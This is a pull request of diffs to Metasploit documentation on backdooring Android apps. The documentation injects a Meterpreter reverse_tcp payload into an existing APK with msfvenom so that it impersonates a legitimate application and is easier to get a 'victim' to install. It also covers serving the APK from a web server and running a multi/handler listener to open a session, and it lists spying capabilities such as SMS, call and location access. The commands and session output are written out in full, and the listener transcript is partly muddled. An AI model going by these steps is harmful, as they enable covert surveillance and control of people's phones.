### PR TITLE
Adding documentation for apk injection

### DIFF
--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -9,11 +9,6 @@ have complex resource structures which may not work with `apktool`.
 Additionally some applications have security measures that prevent the application
 from working as expected once it has been modified.
 
-## Create Meterpreter APK File
-
-It is preferred to use an existing application; however, if you don't want to use an existing
-application you can create a default metasploit android application.
-
 **Finding APKs**
 
 There are many websites that provide standalone APK that can be downloaded, e.g:

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -9,7 +9,7 @@ have complex resource structures which may not work with `apktool`.
 Additionally some applications have security measures that prevent the application
 from working as expected once it has been modified.
 
-## Create Default Metasploit Android Application
+## Create Meterpreter APK File
 
 It is preferred to use an existing application; however, if you don't want to use an existing
 application you can create a default metasploit android application.

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -2,7 +2,7 @@ You can inject the Android Meterpreter into an existing APK using msfvenom. This
 will allow you to impersonate an existing application, which may make it easier 
 to convince your victim to install the APK.
 
-## Vulnerable An Existing Application
+## Inject Payload Into An Existing APK File
 
 It should be possible to inject Meterpreter into any APK, however some applications
 have complex resource structures which may not work with `apktool`.

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -11,8 +11,8 @@ from working as expected once it has been modified.
 
 ## Create Default Metasploit Android Application
 
-It is preferred to use an existing application, however if you don't want to use existing
-application. You can Create default metasploit android application.
+It is preferred to use an existing application; however, if you don't want to use an existing
+application you can create a default metasploit android application.
 
 **Finding APKs**
 

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -2,12 +2,17 @@ You can inject the Android Meterpreter into an existing APK using msfvenom. This
 will allow you to impersonate an existing application, which may make it easier 
 to convince your victim to install the APK.
 
-## Vulnerable Application
+## Vulnerable An Existing Application
 
 It should be possible to inject Meterpreter into any APK, however some applications
 have complex resource structures which may not work with `apktool`.
 Additionally some applications have security measures that prevent the application
 from working as expected once it has been modified.
+
+## Create Default Metasploit Android Application
+
+It is preferred to use an existing application, however if you don't want to use existing
+application. You can Create default metasploit android application.
 
 **Finding APKs**
 
@@ -31,21 +36,34 @@ $ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
 APK Injection (as opposed to generating a single APK payload) requires a few tools
 to be present on your command line already:
 
+* [Java](https://www.oracle.com/java/technologies/downloads/) - Used for building/editing APK
 * [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
 * [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
 * [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
 
 Installing these tools (if they are not installed already) will depend on your OS.
-Apktool can be installed manually or automatically (e.g `brew install apktool`).
+Apktool can be installed manually or automatically (e.g `brew install apktool` OR 'apt install apktool').
 keytool and jarsigner can be installed by installing the appropriate JDK.
 
-## Verification Steps
+## To Create Vulnerable apk An Existing Application
+
+Use:
 
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```
 
-Next, start an Android device. Upload the APK, and execute it, as you would with
+## To Create Default Metasploit Vulnerable apk
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+## Sending apk to other Devices:
+
+There are many method to send APK to victim;s device but one of best method is using apache web server.
+Based on your Operating System Installation of apache is [discribed here](https://www.apachefriends.org/index.html). 
+
+Next, start an Android device. Upload the APK, execute it and run it, as you would with
 a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).
 
 

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -39,7 +39,7 @@ to be present on your command line already:
 * [Java](https://www.oracle.com/java/technologies/downloads/) - Used for building/editing APK
 * [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
 * [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
-* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
+* [apksigner](https://developer.android.com/studio/command-line/apksigner) - To re-sign the APK
 
 Installing these tools (if they are not installed already) will depend on your OS.
 Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -45,7 +45,7 @@ Installing these tools (if they are not installed already) will depend on your O
 Apktool can be installed manually or automatically (e.g `brew install apktool` OR 'apt install apktool').
 keytool and jarsigner can be installed by installing the appropriate JDK.
 
-## To Create Vulnerable apk An Existing Application
+## Inject Payload Into An Existing APK File
 
 Use:
 

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -60,8 +60,7 @@ Use:
 ```
 ## Sending apk to other Devices:
 
-There are many method to send APK to victim's device but one of best method is using apache web server.
-Based on your Operating System Installation of apache is [discribed here](https://www.apachefriends.org/index.html). 
+There are many method to send APK to victim's device but one of the easiest methods is using a web server.
 
 Next, start an Android device. Upload the APK, execute it and run it, as you would with
 a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -60,7 +60,7 @@ Use:
 ```
 ## Sending apk to other Devices:
 
-There are many method to send APK to victim;s device but one of best method is using apache web server.
+There are many method to send APK to victim's device but one of best method is using apache web server.
 Based on your Operating System Installation of apache is [discribed here](https://www.apachefriends.org/index.html). 
 
 Next, start an Android device. Upload the APK, execute it and run it, as you would with

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -2,7 +2,7 @@ You can inject the Android Meterpreter into an existing APK using msfvenom. This
 will allow you to impersonate an existing application, which may make it easier 
 to convince your victim to install the APK.
 
-## Inject Payload Into An Existing APK File
+## Vulnerable Application
 
 It should be possible to inject Meterpreter into any APK, however some applications
 have complex resource structures which may not work with `apktool`.

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -42,7 +42,7 @@ to be present on your command line already:
 * [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
 
 Installing these tools (if they are not installed already) will depend on your OS.
-Apktool can be installed manually or automatically (e.g `brew install apktool` OR 'apt install apktool').
+Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).
 keytool and jarsigner can be installed by installing the appropriate JDK.
 
 ## Inject Payload Into An Existing APK File

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -53,7 +53,7 @@ Use:
 ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```
 
-## To Create Default Metasploit Vulnerable apk
+## Create Meterpreter APK File
 
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk

--- a/documentation/modules/payload/android/meterpreter/injection.md
+++ b/documentation/modules/payload/android/meterpreter/injection.md
@@ -40,9 +40,7 @@ Installing these tools (if they are not installed already) will depend on your O
 Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).
 keytool and jarsigner can be installed by installing the appropriate JDK.
 
-## Inject Payload Into An Existing APK File
-
-Use:
+## Verification Steps
 
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk

--- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md
@@ -4,42 +4,6 @@ do with it already.
 
 The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
 
-## Vulnerable Application
-
-You can test android/meterpreter/reverse_tcp on these devices:
-
-**Android Emulator**
-
-An emulator is the most convenient way to test Android Meterpreter. You can try:
-
-* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal.
-* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK.
-* [GenyMotion](https://www.genymotion.com/download/) - Requires an account. 
-* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators.
-
-
-**A real Android device**
-
-Having a real Android device allows you to test features or vulnerabilities you don't necessarily
-have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also
-get to test it over a real network.
-
-
-## Verification Steps
-
-Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
-execute it.
-
-To create the APK with msfconsole:
-
-```
-msf > use payload/android/meterpreter/reverse_tcp 
-msf payload(reverse_tcp) > set LHOST 192.168.1.199
-LHOST => 192.168.1.199
-msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
-[*] Writing 8992 bytes to /tmp/android.apk...
-msf payload(reverse_tcp) >
-```
 
 ### To create the APK with msfvenom:
 
@@ -60,8 +24,59 @@ screenshots of the Android app that you are backdooring:
 [Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md).
 
 
-Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
-so please refer to the Scenarios section for more information.
+Next, start an Android device. Upload the APK, and execute it. There are different ways to do this.
+
+
+## Vulnerable Application
+
+You can test android/meterpreter/reverse_tcp on these devices:
+
+**Android Emulator**
+
+An emulator is the most convenient way to test Android Meterpreter. You can try:
+
+* [Bluestacks](https://www.bluestacks.com/)  - Very easy to install Android Emulator on Windows.
+* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal.
+* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK.
+* [GenyMotion](https://www.genymotion.com/download/) - Requires an account. 
+* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators.
+
+
+**A real Android device**
+
+Having a real Android device allows you to test features or vulnerabilities you don't necessarily
+have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also
+get to test it over a real network.
+
+
+## Verification Steps
+
+Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
+execute it in victim device.
+
+To start listner run msfconsole in terminal and then set listner settings:
+
+```
+msf > use exploit/multi/handler
+msf > set payload/android/meterpreter/reverse_tcp 
+msf payload(reverse_tcp) > set LHOST 192.168.1.199
+LHOST => 192.168.1.199
+msf payload(reverse_tcp) > run -j
+[*] Writing 8992 bytes to /tmp/android.apk...
+msf payload(reverse_tcp) > sessions    (To check which session is running type: 'sessions', in my case it is 1)
+  ID  Name  Type                           Information   Connection
+  __  ____  ___                            ___________   __________
+  1       android/meterpreter/reverse_tcp  u0_localhost  192.168.1.199:4444=> 192.168.0.110:35713
+  
+  
+msf payload(reverse_tcp) > sessions -i 1   (To set the session to proceed the attack)
+[*] Started reverse TCP handler on 192.168.1.199:4444 
+[*] Starting the payload handler...
+[*] Sending stage (62432 bytes) to 192.168.1.199
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600
+
+meterpreter > 
+```
 
 ## Important Basic Commands
 

--- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md
@@ -52,7 +52,7 @@ get to test it over a real network.
 ## Verification Steps
 
 Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
-execute it in victim device.
+execute it on a victim device.
 
 To start listner run msfconsole in terminal and then set listner settings:
 


### PR DESCRIPTION
Fixes documentation based on new updates of Metasploit Framework. Fixed issue https://github.com/rapid7/metasploit-framework/issues/10187 . Gives Instruction how to use metaspoit framework to generate milicious apk using msfvenom .